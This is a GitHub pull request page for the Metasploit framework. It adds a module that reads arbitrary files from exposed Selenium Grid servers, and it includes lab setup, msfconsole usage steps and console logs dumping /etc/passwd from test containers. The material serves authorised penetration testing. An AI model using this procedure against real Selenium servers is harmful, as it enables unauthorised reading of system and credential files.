Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Selenium file read auxiliary module #19781

Merged
merged 6 commits into from
Jan 8, 2025
Merged

Add Selenium file read auxiliary module #19781

merged 6 commits into from
Jan 8, 2025

Conversation

Takahiro-Yoko
Copy link
Contributor

One of #19753
Chrome RCE PR: #19769
Firefox RCE PR: #19771

Vulnerable Application

If there is an open selenium web driver, a remote attacker can send requests to the victims browser.
In certain cases this can be used to access to the remote file system.

The vulnerability affects:

* all version of open Selenium Server (Grid)

This module was successfully tested on:

* selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
* selenium/standalone-chrome:4.27.0 installed with Docker on Ubuntu 24.04
* selenium/standalone-edge:4.27.0 installed with Docker on Ubuntu 24.04

Installation

  1. docker pull selenium/standalone-firefox:3.141.59

  2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/gather/selenium_file_read
  4. Do: run rhost=<rhost>
  5. You should get a file content

Options

SCHEME (Required)

This is the scheme to use. Default is file.

FILEPATH (Required)

This is the file to read. Default is /etc/passwd.

BROWSER (Required)

This is the browser to use. Default is firefox.

Scenarios

selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04

msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4448
[*] Running module against 192.168.56.16
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid version 4.x detected and ready.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
seluser:x:1200:1201::/home/seluser:/bin/bash
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin

[*] Auxiliary module execution completed

This was referenced Jan 1, 2025
Merged
Merged
@Takahiro-Yoko
Improve
11c1b72 
  * add timeout option
  * print session info
  * apply suggestions (rapid7#19769)
@Takahiro-Yoko
Update check
bca9a5f
@dledda-r7 dledda-r7 self-assigned this Jan 7, 2025
dledda-r7
dledda-r7 reviewed Jan 8, 2025
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hello @Takahiro-Yoko,
Thanks for all the modules you wrote regarding Selenium, I just have one little comment.

msf6 auxiliary(gather/selenium_file_read) > exploit
[*] Running module against 172.18.195.0
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected
[*] Started session (58ddc871-7138-4f46-8f40-ff4367e54f14).
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
seluser:x:1200:1201::/home/seluser:/bin/bash
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
rtkit:x:105:106:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:106:107:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin

[*] Deleted session (58ddc871-7138-4f46-8f40-ff4367e54f14).
[*] Auxiliary module execution completed

modules/auxiliary/gather/selenium_file_read.rb Outdated Show resolved Hide resolved
dledda-r7
dledda-r7 approved these changes Jan 8, 2025
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🚀

@dledda-r7 dledda-r7 merged commit b2e28ef into rapid7:master Jan 8, 2025
36 checks passed
@dledda-r7
Copy link
Contributor

Release Notes

This adds an auxiliary module to perform arbitrary file read on vulnerable Selenium installations using Firefox, Chrome or Edge backends.

@jharris-r7 jharris-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 10, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@dledda-r7 dledda-r7 dledda-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@Takahiro-Yoko @dledda-r7 @jharris-r7